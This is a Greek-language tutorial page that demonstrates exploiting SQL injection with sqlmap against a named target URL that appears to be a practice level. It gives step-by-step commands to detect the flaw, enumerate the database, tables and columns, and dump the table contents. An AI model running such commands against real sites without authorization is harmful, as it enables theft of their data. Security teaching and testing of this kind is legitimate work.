Σε αυτήν την ενότητα, το Wiki.SpaceDesktop θα σας παρουσιάσει ορισμένα εργαλεία που χρησιμοποιούνται για την εκμετάλλευση του SQL Injection .
Επί του παρόντος, υπάρχουν πολλά εργαλεία σάρωσης ευπάθειας ασφαλείας (συμπεριλαμβανομένης της ένεσης SQL). Αυτά τα εργαλεία επιτρέπουν τον εντοπισμό και την αξιοποίηση των ευπαθειών SQL injection αρκετά ισχυρά. Μερικά εργαλεία εκμετάλλευσης ευπάθειας αυτόματης έγχυσης SQL που χρησιμοποιούνται συνήθως περιλαμβάνουν:
Υπάρχουν επίσης κάποια άλλα εργαλεία στα οποία μπορείτε να ανατρέξετε όπως: Netsparker, jSQL Injection, Burp, BBQSQL...
Παρακάτω είναι μια επίδειξη χρήσης του Sqlmap για την εκμετάλλευση της βασικής ένεσης SQL.
Μπορείτε να κατεβάσετε το Sqlmap από τη διεύθυνση http://sqlmap.org/
Το Sqlmap είναι γραμμένο σε Python, επομένως για να χρησιμοποιήσετε αυτό το εργαλείο πρέπει να εγκαταστήσετε την Python. Μπορείτε να κατεβάσετε το python στη διεύθυνση http://www.python.org/downloads/
Πρώτα πρέπει να προσδιορίσετε τον ιστότοπο-στόχο, εδώ έχω τον ακόλουθο στόχο: http://zerocoolhf.altervista.org/level1.php?id=1 (αυτή η σελίδα είναι πλέον νεκρή).
Βήμα 1 : Ανοίξτε το cmd και πληκτρολογήστε την ακόλουθη εντολή:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
Το sqlmap θα εντοπίσει την ευπάθεια του στόχου και θα παρέχει πληροφορίες σχετικά με την ευπάθεια.
Βήμα 2 : Αφού προσδιορίσουμε ότι ο ιστότοπος-στόχος έχει μια ευπάθεια SQL injection, προχωράμε στην εύρεση του ονόματος της βάσης δεδομένων.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> Βάση δεδομένων: my_zerocoolhf
Βήμα 3 : Αφού προσδιορίσουμε το όνομα της βάσης δεδομένων, θα συνεχίσουμε να βρίσκουμε τα ονόματα των πινάκων στη βάση δεδομένων.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> Υπάρχουν 2 πίνακες στη βάση δεδομένων: auth και book
Βήμα 4 : Προσδιορίστε τα ονόματα των στηλών στον πίνακα
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> Προσδιορίστε τις στήλες στον πίνακα του βιβλίου: συγγραφέας, αναγνωριστικό, τιμή, τίτλος.
Βήμα 5 : Απόρριψη δεδομένων από τον πίνακα.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> Έτσι έχουμε αποκτήσει τη βάση δεδομένων του ιστότοπου προορισμού.
Παραπάνω είναι μια βασική επίδειξη χρήσης του sqlmap για την εκμετάλλευση σφαλμάτων SQL injection. Μπορείτε να μάθετε περισσότερα σχετικά με τις επιλογές sqlmap στη διεύθυνση https://github.com/sqlmapproject/sqlmap/wiki/Usage για υποστήριξη της εκμετάλλευσης. SQL injection exploit.
Το να αντιμετωπίζετε ένα ή δύο σφάλματα κατά την εκτέλεση των Windows δεν είναι μεγάλη υπόθεση, αλλά αν αντιμετωπίζετε συχνά προβλήματα στα Windows, μπορεί να υπάρχει πρόβλημα με το λειτουργικό σας σύστημα.
Η κρυφή μνήμη RAM παρέχει γρήγορη πρόσβαση σε δεδομένα υπολογιστή που χρησιμοποιούνται συχνά και επιταχύνει την απόκριση του συστήματος. Πώς λειτουργεί όμως και πώς το αφαιρείτε;
Κάθε φορά που η σύνδεσή σας στο Διαδίκτυο στο σπίτι έχει προβλήματα, συχνά εφαρμόζετε τη μαγική μέθοδο αποσύνδεσης του δρομολογητή, περιμένοντας μερικά λεπτά και στη συνέχεια συνδέοντάς τον ξανά. Όλα θα επιλυθούν και το δίκτυο θα λειτουργεί ξανά σταθερά κανονικά. συχνά. Έχετε αναρωτηθεί, λοιπόν, γιατί η τακτική επανεκκίνηση του δρομολογητή είναι τόσο θαυματουργή σε αυτήν την περίπτωση;
Το Private Character Editor (PCE) είναι ένα μικρό πρόγραμμα των Windows που είναι κρυμμένο στο φάκελο System32. Είναι σχεδόν ένας κλώνος του MS Paint αλλά χρησιμοποιείται για διαφορετικούς δημιουργικούς σκοπούς. Εάν θέλετε να δημιουργήσετε τις δικές σας γραμματοσειρές ή εικονίδια, αυτό είναι το εργαλείο που πρέπει να χρησιμοποιήσετε.
Χρησιμοποιήστε το Clonezilla για να κλωνοποιήσετε ολόκληρο τον παλιό σας σκληρό δίσκο σε έναν νέο σκληρό δίσκο γρήγορα και πολύ απλά. Αυτό το άρθρο θα σας δείξει πώς να κλωνοποιήσετε τη μονάδα δίσκου Windows 10 χρησιμοποιώντας το Clonezilla και μια μονάδα flash USB.
Το σύνολο ταπετσαριών Thanos σε αυτό το άρθρο θα είναι διαθέσιμο σε όλες τις αναλύσεις για όλους τους υπολογιστές και τους φορητούς υπολογιστές
Τα εργαλεία αφαίρεσης κακόβουλου λογισμικού και το λογισμικό προστασίας από ιούς αλληλοσυμπληρώνονται και μπορούν να συνεργαστούν για να εξασφαλίσουν τη μέγιστη ασφάλεια στις συσκευές των χρηστών.
Το FortiClient είναι ένα δωρεάν προϊόν προστασίας από ιούς από την Fortinet. Η Fortinet είναι γνωστή για την κατασκευή προϊόντων υλικού ασφάλειας στον κυβερνοχώρο. Το FortiClient είναι ένα πρόγραμμα πολλαπλών πλατφορμών, διαθέσιμο για Windows, macOS, Linux, Windows Phone, iOS και Android.
Εάν χρησιμοποιείτε Windows, λαμβάνετε το μήνυμα λάθους Δεν είναι δυνατό να ανοίξει αυτό το στοιχείο. Μπορεί να έχει μετακινηθεί, μετονομαστεί ή διαγραφεί, τι πρέπει να κάνω; Ακολουθήστε το παρακάτω άρθρο για λεπτομέρειες.
Ο ερευνητής Mathy Vanhoef από το Πανεπιστήμιο του Leuven ανακάλυψε ένα σοβαρό ελάττωμα ασφαλείας στο πρωτόκολλο ασφαλείας δικτύου Wi-Fi Protected Access II (WPA2).
